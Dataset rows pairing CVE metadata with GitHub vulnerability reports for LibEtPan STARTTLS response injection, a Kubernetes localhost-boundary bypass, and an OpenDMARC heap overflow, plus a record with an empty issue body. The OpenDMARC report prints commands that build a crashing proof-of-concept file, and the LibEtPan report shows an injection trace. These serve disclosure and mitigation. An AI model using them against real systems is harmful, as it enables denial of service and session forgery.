cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2020-15953
2020-07-27T07:15:10.910
LibEtPan through 1.9.4, as used in MailCore 2 through 0.6.3 and other products, has a STARTTLS buffering issue that affects IMAP, SMTP, and POP3. When a server sends a "begin TLS" response, the client reads additional data (e.g., from a meddler-in-the-middle attacker) and evaluates it in a TLS context, aka "response injection."
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00060.html" }, { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00075.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/dinhvh/libetpan/issues/386" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00026.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M65FVH5XPS23NLHFN3ABEGBSCHZAISXN/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QFBWNA5REI5ZGW2DAOEAVHM23MOU6O5J/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202007-55" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00060.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-09/msg00075.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/dinhvh/libetpan/issues/386" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00026.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M65FVH5XPS23NLHFN3ABEGBSCHZAISXN/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QFBWNA5REI5ZGW2DAOEAVHM23MOU6O5J/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202007-55" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libetpan_project:libetpan:*:*:*:*:*:*:*:*", "matchCriteriaId": "265D13E3-68BC-4CD7-B04E-A9713F74895F", "versionEndExcluding": null, "versionEndIncluding": "1.9.4", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libmailcore:mailcore2:*:*:*:*:*:*:*:*", "matchCriteriaId": "3BC108A8-B707-46A8-BD74-19DB4DDD7E56", "versionEndExcluding": null, "versionEndIncluding": "0.6.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "74" ]
74
https://github.com/dinhvh/libetpan/issues/386
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "dinhvh", "libetpan" ]
We found a STARTTLS issue in libEtPan which affects IMAP (and probably other protocols.) When the server responds with its "let's do TLS now message", e.g. `A OK begin TLS\r\n`, libEtPan will read any data after the \r\n and save it into some internal buffer for later processing. This is problematic, because a MITM attacker can inject arbitrary responses. I havn't tested it to this extent, but I suspect that this is enough to forge entire mailboxes even though STARTTLS is used. There is a nice blogpost by Wietse Venema about a "command injection" in postfix (http://www.postfix.org/CVE-2011-0411.html). What we have here is the problem in reverse, i.e. not a command injection, but a "response injection." Example trace to give an intuition: ``` C: A STARTTLS S: A OK begin TLS B OK answer future login command // injected response <--- TLS ---> C: B login user pass // here, libEtPan interprets the injected "B OK" response and proceeds... C: C noop ... ``` An attacker can probably inject more responses and (in the worst case) mimic a whole session. There are (from my view) three possible fixes: 1) discard any remaining data after stls, 2) shovel the extra data into the TLS layer (where it belongs), and 3) error out as this is clearly a protocol violation. The (maybe silly or even wrong) commit in https://github.com/duesee/libetpan/commit/54627507a6979635016e149b1f5f738ff67cedab#diff-b01e5693616d9ee0714273a3491bc713 seems to fix the issue (please ignore the .idea folder :P)
Buffering issues with STARTTLS in IMAP
https://api.github.com/repos/dinhvh/libetpan/issues/386/comments
5
2020-06-18T12:09:50Z
2020-07-31T21:54:22Z
https://github.com/dinhvh/libetpan/issues/386
641,155,783
386
1,356
CVE-2020-8558
2020-07-27T20:15:12.413
The Kubelet and kube-proxy components in versions 1.1.0-1.16.10, 1.17.0-1.17.6, and 1.18.0-1.18.3 were found to contain a security issue which allows adjacent hosts to reach TCP and UDP services bound to 127.0.0.1 running on the node or in the node's network namespace. Such a service is generally thought to be reachable only by other processes on the same host, but due to this defeect, could be reachable by other hosts on the same LAN as the node, or by containers running on the same node as the service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 6.5, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.5, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/92315" }, { "source": "jordan@liggitt.net", "tags": [ "Exploit", "Mailing List", "Mitigation", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-announce/c/sI4KmlH3S2I/m/TljjxOBvBQAJ" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200821-0001/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/92315" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Mailing List", "Mitigation", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-announce/c/sI4KmlH3S2I/m/TljjxOBvBQAJ" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200821-0001/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "9586C74C-1239-4E96-89A6-F618D14EF889", "versionEndExcluding": null, "versionEndIncluding": "1.16.10", "versionStartExcluding": null, "versionStartIncluding": "1.1.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "F7D0C82A-F13C-4D41-854D-51234D20873E", "versionEndExcluding": null, "versionEndIncluding": "1.17.6", "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "FDA694A4-8EC3-47E1-A1F3-CF083D894371", "versionEndExcluding": null, "versionEndIncluding": "1.18.3", "versionStartExcluding": null, "versionStartIncluding": "1.18.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "420" ]
420
https://github.com/kubernetes/kubernetes/issues/92315
[ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: In typical clusters: medium (5.4) [CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) In clusters where API server insecure port has not been disabled: high (8.8) [CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) A security issue was discovered in `kube-proxy` which allows adjacent hosts to reach TCP and UDP services bound to `127.0.0.1` running on the node or in the node's network namespace. For example, if a cluster administrator runs a TCP service on a node that listens on `127.0.0.1:1234`, because of this bug, that service would be potentially reachable by other hosts on the same LAN as the node, or by containers running on the same node as the service. If the example service on port `1234` required no additional authentication (because it assumed that only other localhost processes could reach it), then it could be vulnerable to attacks that make use of this bug. The Kubernetes API Server's default insecure port setting causes the API server to listen on `127.0.0.1:8080` where it will accept requests without authentication. Many Kubernetes installers explicitly disable the API Server's insecure port, but in clusters where it is not disabled, an attacker with access to another system on the same LAN or with control of a container running on the master may be able to reach the API server and execute arbitrary API requests on the cluster. This port is deprecated, and will be removed in Kubernetes v1.20. ### Am I vulnerable? You may be vulnerable if: - You are running a vulnerable version (see below) - Your cluster nodes run in an environment where untrusted hosts share the same layer 2 domain (i.e. same LAN) as nodes - Your cluster allows untrusted pods to run containers with `CAP_NET_RAW` (the Kubernetes default is to allow this capability). - Your nodes (or hostnetwork pods) run any localhost-only services which do not require any further authentication. To list services that are potentially affected, run the following commands on nodes:    - `lsof +c 15 -P -n -i4TCP@127.0.0.1 -sTCP:LISTEN`   - `lsof +c 15 -P -n -i4UDP@127.0.0.1` On a master node, an lsof entry like this indicates that the API server may be listening with an insecure port: ``` COMMAND        PID  USER FD   TYPE DEVICE SIZE/OFF NODE NAME kube-apiserver 123  root  7u  IPv4  26799      0t0  TCP 127.0.0.1:8080 (LISTEN) ``` #### Affected Versions - kubelet/kube-proxy v1.18.0-1.18.3 - kubelet/kube-proxy v1.17.0-1.17.6 - kubelet/kube-proxy <=1.16.10 ### How do I mitigate this vulnerability? Prior to upgrading, this vulnerability can be mitigated by manually adding an iptables rule on nodes. This rule will reject traffic to 127.0.0.1 which does not originate on the node. ` iptables -I INPUT --dst 127.0.0.0/8 ! --src 127.0.0.0/8 -m conntrack ! --ctstate RELATED,ESTABLISHED,DNAT -j DROP` Additionally, if your cluster does not already have the API Server insecure port disabled, we strongly suggest that you disable it. Add the following flag to your kubernetes API server command line: `--insecure-port=0` #### Detection Packets on the wire with an IPv4 destination in the range 127.0.0.0/8 and a layer-2 destination MAC address of a node may indicate that an attack is targeting this vulnerability. #### Fixed Versions Although the issue is caused by `kube-proxy`, the current fix for the issue is in `kubelet` (although future versions may have the fix in `kube-proxy` instead). We recommend updating both `kubelet` and `kube-proxy` to be sure the issue is addressed. The following versions contain the fix: - kubelet/kube-proxy master - fixed by #91569 - kubelet/kube-proxy v1.18.4+ - fixed by #92038 - kubelet/kube-proxy v1.17.7+ - fixed by #92039 - kubelet/kube-proxy v1.16.11+ - fixed by #92040 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster ## Additional Details This issue was originally raised in issue #90259 which details how the `kube-proxy` sets `net.ipv4.conf.all.route_localnet=1` which causes the system not to reject traffic to localhost which originates on other hosts. IPv6-only services that bind to a `localhost` address are not affected.  There may be additional attack vectors possible in addition to those fixed by #91569 and its cherry-picks. For those attacks to succeed, the target service would need to be UDP and the attack could only rely upon sending UDP datagrams since it wouldn't receive any replies. Finally, the target node would need to have reverse-path filtering disabled for an attack to have any effect. Work is ongoing to determine whether and how this issue should be fixed. See #91666 for up-to-date status on this issue.   #### Acknowledgements This vulnerability was reported by János Kövér, Ericsson with additional impacts reported by Rory McCune, NCC Group and Yuval Avrahami and Ariel Zelivansky, Palo Alto Networks. /area security /kind bug /committee product-security /sig network /sig node /area kubelet
CVE-2020-8558: Node setting allows for neighboring hosts to bypass localhost boundary
https://api.github.com/repos/kubernetes/kubernetes/issues/92315/comments
17
2020-06-19T18:38:58Z
2021-12-02T22:54:39Z
https://github.com/kubernetes/kubernetes/issues/92315
642,156,921
92,315
1,357
CVE-2020-12460
2020-07-27T23:15:12.373
OpenDMARC through 1.3.2 and 1.4.x through 1.4.0-Beta1 has improper null termination in the function opendmarc_xml_parse that can result in a one-byte heap overflow in opendmarc_xml when parsing a specially crafted DMARC aggregate report. This can cause remote memory corruption when a '\0' byte overwrites the heap metadata of the next chunk and its PREV_INUSE flag.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/trusteddomainproject/OpenDMARC/issues/64" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00026.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2D4JGHMALEJEWWG56DKR5OZB22TK7W5B/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JHDKMCZGE3W4XBP76NLI2Q7IOZHXLD4A/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KBOGOQOK3TIWWJV66MW5YWNRJAFFYGR5/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202011-02" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://sourceforge.net/projects/opendmarc/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/trusteddomainproject/OpenDMARC/issues/64" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00026.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2D4JGHMALEJEWWG56DKR5OZB22TK7W5B/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JHDKMCZGE3W4XBP76NLI2Q7IOZHXLD4A/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/KBOGOQOK3TIWWJV66MW5YWNRJAFFYGR5/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202011-02" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://sourceforge.net/projects/opendmarc/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:trusteddomain:opendmarc:*:*:*:*:*:*:*:*", "matchCriteriaId": "48B8EAC9-8D6C-404F-855E-6D23BE1A4E81", "versionEndExcluding": null, "versionEndIncluding": "1.3.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:trusteddomain:opendmarc:1.4.0:beta0:*:*:*:*:*:*", "matchCriteriaId": "FDE93651-8197-45CA-A00F-992858D5555C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:trusteddomain:opendmarc:1.4.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "CFE77540-FB92-4122-AB00-77C62B548D49", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*", "matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/trusteddomainproject/OpenDMARC/issues/64
[ "Exploit", "Third Party Advisory" ]
github.com
[ "trusteddomainproject", "OpenDMARC" ]
There is a memory corruption vulnerability in `opendmarc_xml()` of libopendmarc during parsing of DMARC aggregate reports. The versions affected by this seem to be OpenDMARC through 1.3.2 and 1.4.x through 1.4.0-Beta1. The root cause is improper null termination. The function opendmarc_xml_parse() does not explicitly add a null terminator ('\0') to the buffer holding the XML data after reading the contents from a report file. This can cause an off-by-one error in opendmarc_xml() in certain cases depending on the report file, resulting in a one-byte heap overflow. A null byte write occurs during the parsing at opendmarc_xml.c:171, `*sp = '\0'`. Eventually, during parsing of a specially crafted report, this null byte will overflow to the next chunk on the heap, overwriting the heap metadata, as indicated by the following valgrind output. ``` ==4014== Invalid write of size 1 ==4014== at 0x401223: opendmarc_xml (opendmarc_xml.c:171) ==4014== by 0x4020DC: opendmarc_xml_parse (opendmarc_xml.c:614) ==4014== by 0x400D23: main (in /home/peppe/Downloads/test) ==4014== Address 0x5204478 is 0 bytes after a block of size 1,080 alloc'd ==4014== at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==4014== by 0x402070: opendmarc_xml_parse (opendmarc_xml.c:575) ==4014== by 0x400D23: main (in /home/peppe/Downloads/test) ``` The size field and the least significant bits used as flags are overwritten in the metadata. The relevant flag for this vulnerability is the bit indicating 'previous chunk in use', known as PREV_INUSE which will be set to zero and determines if the previous chunk (storing bufp) is free. When the buffer is later free'd at opendmarc_xml.c:616, `(void) free(bufp)` - a crash occurs as `bufp` is listed as not used. ``` (gdb) run poc.xml Starting program: /home/peppe/Downloads/test poc.xml *** Error in `/home/peppe/Downloads/test': double free or corruption (!prev): 0x0000000000605010 *** . . Program received signal SIGABRT, Aborted. 0x00007ffff7a42428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 54 ../sysdeps/unix/sysv/linux/raise.c: No such file or directory. (gdb) bt #0 0x00007ffff7a42428 in __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:54 #1 0x00007ffff7a4402a in __GI_abort () at abort.c:89 #2 0x00007ffff7a847ea in __libc_message (do_abort=do_abort@entry=2, fmt=fmt@entry=0x7ffff7b9ded8 "*** Error in `%s': %s: 0x%s ***\n") at ../sysdeps/posix/libc_fatal.c:175 #3 0x00007ffff7a8d37a in malloc_printerr (ar_ptr=<optimized out>, ptr=<optimized out>, str=0x7ffff7b9e008 "double free or corruption (!prev)", action=3) at malloc.c:5006 #4 _int_free (av=<optimized out>, p=<optimized out>, have_lock=0) at malloc.c:3867 #5 0x00007ffff7a9153c in __GI___libc_free (mem=<optimized out>) at malloc.c:2968 #6 0x00000000004020e8 in opendmarc_xml_parse (fname=<optimized out>, err_buf=0x7fffffffdcd0 "", err_len=256) at opendmarc_xml.c:616 #7 0x0000000000400d24 in main () (gdb) frame 6 #6 0x00000000004020e8 in opendmarc_xml_parse (fname=<optimized out>, err_buf=0x7fffffffdcd0 "", err_len=256) at opendmarc_xml.c:616 616 (void) free(bufp); (gdb) p bufp $1 = 0x605010 "<feedback" (gdb) ``` A remote attacker could provide a specially crafted report that is parsed by this library, causing a denial of service. It could possibly lead to code execution depending on how libopendmarc is used and integrated into the application, in particular if the opendmarc_xml function is used explicitly without calling opendmarc_xml_parse and with input that is not null-terminated. A DMARC aggregate report that triggers this vulnerability can be generated using the following commands: ``` printf '<feedback></feedback>' > poc.xml; printf 'A%.0s' {1..1053} >> poc.xml; printf '<begin' >> poc.xml ```
Memory corruption in opendmarc_xml()
https://api.github.com/repos/trusteddomainproject/OpenDMARC/issues/64/comments
5
2020-07-25T10:48:50Z
2020-09-20T10:18:12Z
https://github.com/trusteddomainproject/OpenDMARC/issues/64
665,563,517
64
1,358
CVE-2020-12845
2020-07-27T23:15:12.437
Cherokee 0.4.27 to 1.2.104 is affected by a denial of service due to a NULL pointer dereferences. A remote unauthenticated attacker can crash the server by sending an HTTP request to protected resources using a malformed Authorization header that is mishandled during a cherokee_buffer_add call within cherokee_validator_parse_basic or cherokee_validator_parse_digest.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "http://cherokee-project.com/downloads.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cherokee/webserver/issues/1242" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/cherokee/webserver/releases" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202012-09" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "http://cherokee-project.com/downloads.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/cherokee/webserver/issues/1242" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/cherokee/webserver/releases" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202012-09" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cherokee-project:cherokee:*:*:*:*:*:*:*:*", "matchCriteriaId": "95AA5C29-D669-46CA-ADFC-91D47AD67050", "versionEndExcluding": null, "versionEndIncluding": "1.2.104", "versionStartExcluding": null, "versionStartIncluding": "0.4.27", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/cherokee/webserver/issues/1242
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "cherokee", "webserver" ]
